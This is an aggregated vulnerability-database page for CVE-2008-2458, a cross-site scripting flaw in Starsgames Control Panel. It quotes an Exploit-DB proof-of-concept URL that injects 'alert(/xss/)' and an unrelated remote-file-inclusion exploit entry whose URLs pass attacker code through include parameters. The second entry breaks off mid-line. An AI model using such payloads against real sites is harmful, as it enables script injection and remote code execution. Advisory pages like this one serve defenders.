CVE-2008-2458
published 2008-05-27CVE-2008-2458: Cross-site scripting (XSS) vulnerability in index.php in Starsgames Control Panel 4.6.2 and earlier allows remote attackers to inject arbitrary web script or…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.47%
70.4th percentile
Cross-site scripting (XSS) vulnerability in index.php in Starsgames Control Panel 4.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the st parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 4shared | starsgames_control_panel | <= 4.6.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting
exploitdb·2008-05-20
CVE-2008-2458 Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting
Starsgames Control Panel 4.6.2 - 'index.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/29295/info
Starsgames Control Panel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showtopic=18&st= alert(/xss/) http://www.example.com/index.php?showtopic=18&st=
Exploit-DB
Kostenloses Linkmanagementscript - Remote File Inclusion
exploitdb·2008-05-14
CVE-2008-2270 Kostenloses Linkmanagementscript - Remote File Inclusion
Kostenloses Linkmanagementscript - Remote File Inclusion
---
############################################
# Remote File Inclusion Vulnerability #
# Kostenloses Linkmanagementscript #
############################################
## Author : HaCkeR_EgY
## C0NTACT : [email protected]
## H^OME : www.PAL-HaCkeR.com & ATSDP.COM
## Scripte Name : Kostenloses Linkmanagementscript
## download scripte : http://scripte.phpway.de/
## Downloads: 2458
########################################################################
## VuRn C0DE :
Line 91 :
## ExPL0!T :
1=====>>http://www.target.de/script/template\index.php?main_page_directory= Ev!L C0dE
2=====>>http://www.target.de/script/template\index.php?page_to_include= Ev!L C0dE
## L!ve DeM0 :
=======>>http://scripte.phpway.de/demo/templ
No writeups or analysis indexed.
http://secunia.com/advisories/30321http://www.securityfocus.com/archive/1/492264/100/0/threadedhttp://www.securityfocus.com/bid/29295https://exchange.xforce.ibmcloud.com/vulnerabilities/42544http://secunia.com/advisories/30321http://www.securityfocus.com/archive/1/492264/100/0/threadedhttp://www.securityfocus.com/bid/29295https://exchange.xforce.ibmcloud.com/vulnerabilities/42544
2008-05-27
Published